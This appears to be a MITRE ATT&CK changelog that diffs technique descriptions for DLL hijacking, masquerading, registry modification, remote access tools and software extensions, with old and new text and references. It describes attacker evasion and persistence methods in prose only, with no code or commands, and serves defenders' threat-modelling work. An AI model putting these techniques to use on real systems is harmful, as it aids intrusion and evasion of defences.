Adversaries may execute their own malicious payloads by side-loading DLLs. Side-loading involves hijacking which DLL a program loads by planting and then invoking a legitimate application that executes their payload(s).
Side-loading positions both the victim application and malicious payload(s) alongside each other. Adversaries likely use side-loading as a means of masking actions they perform under a legitimate, trusted, and potentially elevated system or software process. Benign executables used to side-load payloads may not be flagged during delivery and/or execution. Adversary payloads may also be encrypted/packed or otherwise obfuscated until loaded into the memory of the trusted process.
Adversaries may also side-load other packages, such as BPLs (Borland Package Library).(Citation: kroll bpl)
### DLL Search Order Hijacking
Adversaries may execute their own malicious payloads by hijacking the search order that Windows uses to load DLLs. This search order is a sequence of special and standard search locations that a program checks when loading a DLL. An adversary can plant a trojan DLL in a directory that will be prioritized by the DLL search order over the location of a legitimate library. This will cause Windows to load the malicious DLL when it is called for by the victim program.(Citation: unit 42)
### DLL Redirection
Adversaries may directly modify the search order via DLL redirection, which after being enabled (in the Registry or via the creation of a redirection file) may cause a program to load a DLL from a different location.(Citation: Microsoft redirection)(Citation: Microsoft - manifests/assembly)
### Phantom DLL Hijacking
Adversaries may leverage phantom DLL hijacking by targeting references to non-existent DLL files. They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.(Citation: Hexacorn DLL Hijacking)(Citation: Hijack DLLs CrowdStrike)
### DLL Substitution
Adversaries may target existing, valid DLL files and substitute them with their own malicious DLLs, planting them with the same name and in the same location as the valid DLL file.(Citation: Wietze Beukema DLL Hijacking)
Programs that fall victim to DLL hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace, evading defenses.
Remote DLL hijacking can occur when a program sets its current directory to a remote location, such as a Web share, before loading a DLL.(Citation: dll pre load owasp)(Citation: microsoft remote preloading)
If a valid DLL is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation. |
| x_mitre_version | 1.3 | 2.0 |
| external_references[1] | {'source_name': 'Adversaries Hijack DLLs', 'description': 'CrowdStrike, Falcon OverWatch Team. (2022, December 30). Retrieved October 19, 2023.', 'url': 'https://www.crowdstrike.com/blog/4-ways-adversaries-hijack-dlls/'} | {'source_name': 'Hijack DLLs CrowdStrike', 'description': ' falcon.overwatch.team. (2022, December 30). 4 Ways Adversaries Hijack DLLs — and How CrowdStrike Falcon OverWatch Fights Back. Retrieved January 30, 2025.', 'url': 'https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/'} |
| external_references[8] | {'source_name': 'Microsoft Manifests', 'description': 'Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.', 'url': 'https://msdn.microsoft.com/en-US/library/aa375365'} | {'source_name': 'unit 42', 'description': 'Tom Fakterman, Chen Erlich, & Assaf Dahan. (2024, February 22). Intruders in the Library: Exploring DLL Hijacking. Retrieved January 30, 2025.', 'url': 'https://unit42.paloaltonetworks.com/dll-hijacking-techniques/'} |
| external_references[2] | {'source_name': 'FireEye Hijacking July 2010', 'description': 'Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html'} | {'source_name': 'kroll bpl', 'description': 'Dave Truman. (2024, June 24). Novel Technique Combination Used In IDATLOADER Distribution. Retrieved January 30, 2025.', 'url': 'https://www.kroll.com/en/insights/publications/cyber/idatloader-distribution'} |
| external_references[9] | {'source_name': 'FireEye DLL Search Order Hijacking', 'description': 'Nick Harbour. (2010, September 1). DLL Search Order Hijacking Revisited. Retrieved March 13, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html'} | {'source_name': 'Wietze Beukema DLL Hijacking', 'description': 'Wietze Beukema. (2020, June 22). Hijacking DLLs in Windows. Retrieved April 8, 2025.', 'url': 'https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows'} |
| external_references[7] | {'source_name': 'Microsoft Dynamic Link Library Search Order', 'description': 'Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.', 'url': 'https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN'} | {'source_name': 'dll pre load owasp', 'description': 'OWASP. (n.d.). Binary Planting. Retrieved January 30, 2025.', 'url': 'https://owasp.org/www-community/attacks/Binary_planting'} |
| external_references[6] | {'source_name': 'Microsoft Dynamic-Link Library Redirection', 'description': 'Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.', 'url': 'https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN'} | {'source_name': 'Microsoft redirection', 'description': 'Microsoft. (2023, October 12). Dynamic-link library redirection. Retrieved January 30, 2025.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN'} |
| external_references[5] | {'source_name': 'Microsoft Security Advisory 2269637', 'description': 'Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.', 'url': 'https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637'} | {'source_name': 'Microsoft - manifests/assembly', 'description': 'Microsoft. (2021, January 7). Manifests. Retrieved January 30, 2025.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/sbscs/manifests?redirectedfrom=MSDN'} |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'microsoft remote preloading', 'description': 'Microsoft. (2014, May 13). Microsoft Security Advisory 2269637: Insecure Library Loading Could Allow Remote Code Execution. Retrieved January 30, 2025.', 'url': 'https://learn.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637'} |
| x_mitre_contributors | | Wietze Beukema @Wietze |
| x_mitre_data_sources | | Process: Process Creation |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| external_references | {'source_name': 'FireEye fxsst June 2011', 'description': 'Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html'} | |
| external_references | {'source_name': 'OWASP Binary Planting', 'description': 'OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.', 'url': 'https://www.owasp.org/index.php/Binary_planting'} | |
[T1036.005] Masquerading: Match Legitimate Resource Name or Location
Current version: 2.0
Version changed from: 1.2 → 2.0
|
|
|---|
| t | Adversaries may match or approximate the name or location of | t | Adversaries may match or approximate the name or location of |
| legitimate files or resources when naming/placing them. Thi | | legitimate files, Registry keys, or other resources when na |
| s is done for the sake of evading defenses and observation. | | ming/placing them. This is done for the sake of evading defe |
| This may be done by placing an executable in a commonly trus | | nses and observation. This may be done by placing an execu |
| ted directory (ex: under System32) or giving it the name of | | table in a commonly trusted directory (ex: under System32) o |
| a legitimate, trusted program (ex: svchost.exe). In containe | | r giving it the name of a legitimate, trusted program (ex: ` |
| rized environments, this may also be done by creating a reso | | svchost.exe`). Alternatively, a Windows Registry key may be |
| urce in a namespace that matches the naming convention of a | | given a close approximation to a key used by a legitimate pr |
| container pod or cluster. Alternatively, a file or container | | ogram. In containerized environments, a threat actor may cre |
| image name given may be a close approximation to legitimate | | ate a resource in a trusted namespace or one that matches th |
| programs/images or something innocuous. Adversaries may al | | e naming convention of a container pod or cluster.(Citation: |
| so use the same icon of the file they are trying to mimic. | | Aquasec Kubernetes Backdoor 2023) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:30:45.064000+00:00 | 2025-04-15 19:58:11.443000+00:00 |
| name | Match Legitimate Name or Location | Match Legitimate Resource Name or Location |
| description | Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic. | Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation.
This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023) |
| x_mitre_version | 1.2 | 2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Aquasec Kubernetes Backdoor 2023', 'description': 'Michael Katchinskiy and Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved March 24, 2025.', 'url': 'https://www.aquasec.com/blog/leveraging-kubernetes-rbac-to-backdoor-clusters/'} |
| x_mitre_platforms | | ESXi |
[T1112] Modify Registry
Current version: 2.0
Version changed from: 1.4 → 2.0
|
|
|---|
| t | Adversaries may interact with the Windows Registry to hide c | t | Adversaries may interact with the Windows Registry as part o |
| onfiguration information within Registry keys, remove inform | | f a variety of other techniques to aid in defense evasion, p |
| ation as part of cleaning up, or as part of other techniques | | ersistence, and execution. Access to specific areas of the |
| to aid in persistence and execution. Access to specific ar | | Registry depends on account permissions, with some keys requ |
| eas of the Registry depends on account permissions, some req | | iring administrator-level access. The built-in Windows comma |
| uiring administrator-level access. The built-in Windows comm | | nd-line utility [Reg](https://attack.mitre.org/software/S007 |
| and-line utility [Reg](https://attack.mitre.org/software/S00 | | 5) may be used for local or remote Registry modification.(Ci |
| 75) may be used for local or remote Registry modification. ( | | tation: Microsoft Reg) Other tools, such as remote access to |
| Citation: Microsoft Reg) Other tools may also be used, such | | ols, may also contain functionality to interact with the Reg |
| as a remote access tool, which may contain functionality to | | istry through the Windows API. The Registry may be modified |
| interact with the Registry through the Windows API. Registr | | in order to hide configuration information or malicious pay |
| y modifications may also include actions to hide keys, such | | loads via [Obfuscated Files or Information](https://attack.m |
| as prepending key names with a null character, which will ca | | itre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2 |
| use an error and/or be ignored when read via [Reg](https://a | | 019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft |
| ttack.mitre.org/software/S0075) or other utilities using the | | BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra |
| Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversari | | 2018) The Registry may also be modified to [Impair Defenses |
| es may abuse these pseudo-hidden keys to conceal payloads/co | | ](https://attack.mitre.org/techniques/T1562), such as by ena |
| mmands used to maintain persistence. (Citation: TrendMicro P | | bling macros for all Microsoft Office products, allowing pri |
| OWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017) | | vilege escalation without alerting the user, increasing the |
| The Registry of a remote system may be modified to aid in | | maximum number of allowed outbound requests, and/or modifyin |
| execution of files as part of lateral movement. It requires | | g systems to store plaintext credentials in memory.(Citation |
| the remote Registry service to be running on the target syst | | : CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019) T |
| em. (Citation: Microsoft Remote) Often [Valid Accounts](http | | he Registry of a remote system may be modified to aid in exe |
| s://attack.mitre.org/techniques/T1078) are required, along w | | cution of files as part of lateral movement. It requires the |
| ith access to the remote system's [SMB/Windows Admin Shares] | | remote Registry service to be running on the target system. |
| (https://attack.mitre.org/techniques/T1021/002) for RPC comm | | (Citation: Microsoft Remote) Often [Valid Accounts](https:// |
| unication. | | attack.mitre.org/techniques/T1078) are required, along with |
| | | access to the remote system's [SMB/Windows Admin Shares](htt |
| | | ps://attack.mitre.org/techniques/T1021/002) for RPC communic |
| | | ation. Finally, Registry modifications may also include act |
| | | ions to hide keys, such as prepending key names with a null |
| | | character, which will cause an error and/or be ignored when |
| | | read via [Reg](https://attack.mitre.org/software/S0075) or o |
| | | ther utilities using the Win32 API.(Citation: Microsoft Regh |
| | | ide NOV 2006) Adversaries may abuse these pseudo-hidden keys |
| | | to conceal payloads/commands used to maintain persistence.( |
| | | Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps |
| | | Hiding Reg Jul 2017) |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host forensic analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-14 19:19:54.148000+00:00 | 2025-04-15 19:58:33.486000+00:00 |
| description | Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.
Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication. | Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.
Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.
The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017) |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
| x_mitre_version | 1.4 | 2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| kill_chain_phases | | {'kill_chain_name': 'mitre-attack', 'phase_name': 'persistence'} |
| external_references | | {'source_name': 'CISA Russian Gov Critical Infra 2018', 'description': 'CISA. (2018, March 16). Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved March 24, 2025.', 'url': 'https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors'} |
| external_references | | {'source_name': 'CISA LockBit 2023', 'description': 'CISA. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved March 24, 2025.', 'url': 'https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a'} |
| external_references | | {'source_name': 'Avaddon Ransomware 2021', 'description': 'Javier Yuste and Sergio Pastrana. (2021). Avaddon ransomware: an in-depth analysis and decryption of infected systems. Retrieved March 24, 2025.', 'url': 'https://arxiv.org/pdf/2102.04796'} |
| external_references | | {'source_name': 'Microsoft BlackCat Jun 2022', 'description': 'Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022.', 'url': 'https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/'} |
| external_references | | {'source_name': 'Unit42 BabyShark Feb 2019', 'description': 'Unit 42. (2019, February 22). New BabyShark Malware Targets U.S. National Security Think Tanks. Retrieved October 7, 2019.', 'url': 'https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/'} |
| x_mitre_contributors | | Gerardo Santos |
[T1219] Remote Access Tools
Current version: 3.0
Version changed from: 2.3 → 3.0
|
|
|---|
| t | An adversary may use legitimate desktop support and remote a | t | An adversary may use legitimate remote access tools to estab |
| ccess software to establish an interactive command and contr | | lish an interactive command and control channel within a net |
| ol channel to target systems within networks. These services | | work. Remote access tools create a session between two trust |
| , such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, | | ed hosts through a graphical interface, a command line inter |
| `LogMein`, `AmmyyAdmin`, and other remote monitoring and man | | action, a protocol tunnel via development or management soft |
| agement (RMM) tools, are commonly used as legitimate technic | | ware, or hardware-level access such as KVM (Keyboard, Video, |
| al support software and may be allowed by application contro | | Mouse) over IP solutions. Desktop support software (usually |
| l within a target environment.(Citation: Symantec Living off | | graphical interface) and remote management software (typica |
| the Land)(Citation: CrowdStrike 2015 Global Threat Report)( | | lly command line interface) allow a user to control a comput |
| Citation: CrySyS Blog TeamSpy) Remote access software may b | | er remotely as if they are a local user inheriting the user |
| e installed and used post-compromise as an alternate communi | | or software permissions. This software is commonly used for |
| cations channel for redundant access or as a way to establis | | troubleshooting, software installation, and system managemen |
| h an interactive remote desktop session with the target syst | | t.(Citation: Symantec Living off the Land)(Citation: CrowdSt |
| em. They may also be used as a component of malware to estab | | rike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSp |
| lish a reverse connection or back-connect to a service or ad | | y) Adversaries may similarly abuse response features include |
| versary-controlled system. Adversaries may similarly abuse | | d in EDR and other defensive tools that enable remote access |
| response features included in EDR and other defensive tools | | . Remote access tools may be installed and used post-compro |
| that enable remote access. Installation of many remote acc | | mise as an alternate communications channel for redundant ac |
| ess software may also include persistence (e.g., the softwar | | cess or to establish an interactive remote desktop session w |
| e's installation routine creates a [Windows Service](https:/ | | ith the target system. It may also be used as a malware comp |
| /attack.mitre.org/techniques/T1543/003)). Remote access modu | | onent to establish a reverse connection or back-connect to a |
| les/features may also exist as part of otherwise existing so | | service or adversary-controlled system. Installation of ma |
| ftware (e.g., Google Chrome’s Remote Desktop).(Citation: Goo | | ny remote access tools may also include persistence (e.g., t |
| gle Chrome Remote Desktop)(Citation: Chrome Remote Desktop) | | he software's installation routine creates a [Windows Servic |
| | | e](https://attack.mitre.org/techniques/T1543/003)). Remote a |
| | | ccess modules/features may also exist as part of otherwise e |
| | | xisting software (e.g., Google Chrome’s Remote Desktop).(Cit |
| | | ation: Google Chrome Remote Desktop)(Citation: Chrome Remote |
| | | Desktop) |
New Mitigations:
- M1034: Limit Hardware Installation
New Detections:
- DS0016: Drive (Drive Creation)
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-12 23:52:30.489000+00:00 | 2025-04-15 19:58:25.651000+00:00 |
| name | Remote Access Software | Remote Access Tools |
| description | An adversary may use legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks. These services, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy)
Remote access software may be installed and used post-compromise as an alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary-controlled system.
Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.
Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop) | An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session between two trusted hosts through a graphical interface, a command line interaction, a protocol tunnel via development or management software, or hardware-level access such as KVM (Keyboard, Video, Mouse) over IP solutions. Desktop support software (usually graphical interface) and remote management software (typically command line interface) allow a user to control a computer remotely as if they are a local user inheriting the user or software permissions. This software is commonly used for troubleshooting, software installation, and system management.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.
Remote access tools may be installed and used post-compromise as an alternate communications channel for redundant access or to establish an interactive remote desktop session with the target system. It may also be used as a malware component to establish a reverse connection or back-connect to a service or adversary-controlled system.
Installation of many remote access tools may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop) |
| x_mitre_version | 2.3 | 3.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_data_sources | | Drive: Drive Creation |
[T1036.003] Masquerading: Rename Legitimate Utilities
Current version: 2.0
Version changed from: 1.1 → 2.0
|
|
|---|
| t | Adversaries may rename legitimate system utilities to try to | t | Adversaries may rename legitimate / system utilities to try |
| evade security mechanisms concerning the usage of those uti | | to evade security mechanisms concerning the usage of those u |
| lities. Security monitoring and control mechanisms may be in | | tilities. Security monitoring and control mechanisms may be |
| place for system utilities adversaries are capable of abusi | | in place for legitimate utilities adversaries are capable of |
| ng. (Citation: LOLBAS Main Site) It may be possible to bypas | | abusing, including both built-in binaries and tools such as |
| s those security mechanisms by renaming the utility prior to | | PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main S |
| utilization (ex: rename <code>rundll32.exe</code>). (Citati | | ite)(Citation: Huntress Python Malware 2025)(Citation: The D |
| on: Elastic Masquerade Ball) An alternative case occurs when | | FIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed |
| a legitimate utility is copied or moved to a different dire | | PSExec) It may be possible to bypass those security mechanis |
| ctory and renamed to avoid detections based on system utilit | | ms by renaming the utility prior to utilization (ex: rename |
| ies executing from non-standard paths. (Citation: F-Secure C | | <code>rundll32.exe</code>).(Citation: Elastic Masquerade Bal |
| ozyDuke) | | l) An alternative case occurs when a legitimate utility is c |
| | | opied or moved to a different directory and renamed to avoid |
| | | detections based on these utilities executing from non-stan |
| | | dard paths.(Citation: F-Secure CozyDuke) |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_contributors | | ['Matt Anderson, @\u200cnosecurething, Huntress'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:30:45.065000+00:00 | 2025-04-15 19:59:02.921000+00:00 |
| name | Rename System Utilities | Rename Legitimate Utilities |
| description | Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke) | Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main Site)(Citation: Huntress Python Malware 2025)(Citation: The DFIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed PSExec) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename rundll32.exe).(Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths.(Citation: F-Secure CozyDuke) |
| x_mitre_version | 1.1 | 2.0 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Huntress Python Malware 2025', 'description': 'Matthew Brennan. (2024, July 5). Snakes on a Domain: An Analysis of a Python Malware Loader. Retrieved April 3, 2025.', 'url': 'https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader'} |
| external_references | | {'source_name': 'Splunk Detect Renamed PSExec', 'description': 'Splunk. (2025, February 24). Detection: Detect Renamed PSExec. Retrieved April 3, 2025.', 'url': 'https://research.splunk.com/endpoint/683e6196-b8e8-11eb-9a79-acde48001122/'} |
| external_references | | {'source_name': 'The DFIR Report AutoHotKey 2023', 'description': 'The DFIR Report. (2023, February 6). Collect, Exfiltrate, Sleep, Repeat. Retrieved April 3, 2025.', 'url': 'https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/'} |
[T1176] Software Extensions
Current version: 2.0
Version changed from: 1.3 → 2.0
|
|
|---|
| t | Adversaries may abuse Internet browser extensions to establi | t | Adversaries may abuse software extensions to establish persi |
| sh persistent access to victim systems. Browser extensions o | | stent access to victim systems. Software extensions are modu |
| r plugins are small programs that can add functionality and | | lar components that enhance or customize the functionality o |
| customize aspects of Internet browsers. They can be installe | | f software applications, including web browsers, Integrated |
| d directly or through a browser's app store and generally ha | | Development Environments (IDEs), and other platforms.(Citati |
| ve access and permissions to everything that the browser can | | on: Chrome Extension C2 Malware)(Citation: Abramovsky VSCode |
| access.(Citation: Wikipedia Browser Extension)(Citation: Ch | | Security) Extensions are typically installed via official m |
| rome Extensions Definition) Malicious extensions can be ins | | arketplaces, app stores, or manually loaded by users, and th |
| talled into a browser through malicious app store downloads | | ey often inherit the permissions and access levels of the ho |
| masquerading as legitimate extensions, through social engine | | st application. Malicious extensions can be introduced |
| ering, or by an adversary that has already compromised a sys | | through various methods, including social engineering, compr |
| tem. Security can be limited on browser app stores so it may | | omised marketplaces, or direct installation by users or by a |
| not be difficult for malicious extensions to defeat automat | | dversaries who have already gained access to a system. Malic |
| ed scanners.(Citation: Malicious Chrome Extension Numbers) D | | ious extensions can be named similarly or identically to ben |
| epending on the browser, adversaries may also manipulate an | | ign extensions in marketplaces. Security mechanisms in exten |
| extension's update url to install updates from an adversary | | sion marketplaces may be insufficient to detect malicious co |
| controlled server or manipulate the mobile configuration fil | | mponents, allowing adversaries to bypass automated scanners |
| e to silently install additional extensions. Previous to ma | | or exploit trust established during the installation process |
| cOS 11, adversaries could silently install browser extension | | . Adversaries may also abuse benign extensions to achieve th |
| s via the command line using the <code>profiles</code> tool | | eir objectives, such as using legitimate functionality to tu |
| to install malicious <code>.mobileconfig</code> files. In ma | | nnel data or bypass security controls. The modular nature |
| cOS 11+, the use of the <code>profiles</code> tool can no lo | | of extensions and their integration with host applications m |
| nger install configuration profiles, however <code>.mobileco | | ake them an attractive target for adversaries seeking to exp |
| nfig</code> files can be planted and installed with user int | | loit trusted software ecosystems. Detection can be challengi |
| eraction.(Citation: xorrior chrome extensions macOS) Once t | | ng due to the inherent trust placed in extensions during ins |
| he extension is installed, it can browse to websites in the | | tallation and their ability to blend into normal application |
| background, steal all information that a user enters into a | | workflows. |
| browser (including credentials), and be used as an installer | | |
| for a RAT for persistence.(Citation: Chrome Extension Crypt | | |
| o Miner)(Citation: ICEBRG Chrome Extensions)(Citation: Banke | | |
| r Google Chrome Extension Steals Creds)(Citation: Catch All | | |
| Chrome Extension) There have also been instances of botnets | | |
| using a persistent backdoor through malicious Chrome extens | | |
| ions for [Command and Control](https://attack.mitre.org/tact | | |
| ics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Ex | | |
| tension C2 Malware) Adversaries may also use browser extensi | | |
| ons to modify browser permissions and components, privacy se | | |
| ttings, and other security controls for [Defense Evasion](ht | | |
| tps://attack.mitre.org/tactics/TA0005).(Citation: Browers Fr | | |
| iarFox)(Citation: Browser Adrozek) | | |
New Detections:
- DS0029: Network Traffic (Network Traffic Flow)
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:48:15.871000+00:00 | 2025-04-15 19:58:22.784000+00:00 |
| name | Browser Extensions | Software Extensions |
| description | Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.(Citation: Wikipedia Browser Extension)(Citation: Chrome Extensions Definition)
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so it may not be difficult for malicious extensions to defeat automated scanners.(Citation: Malicious Chrome Extension Numbers) Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary controlled server or manipulate the mobile configuration file to silently install additional extensions.
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles, however .mobileconfig files can be planted and installed with user interaction.(Citation: xorrior chrome extensions macOS)
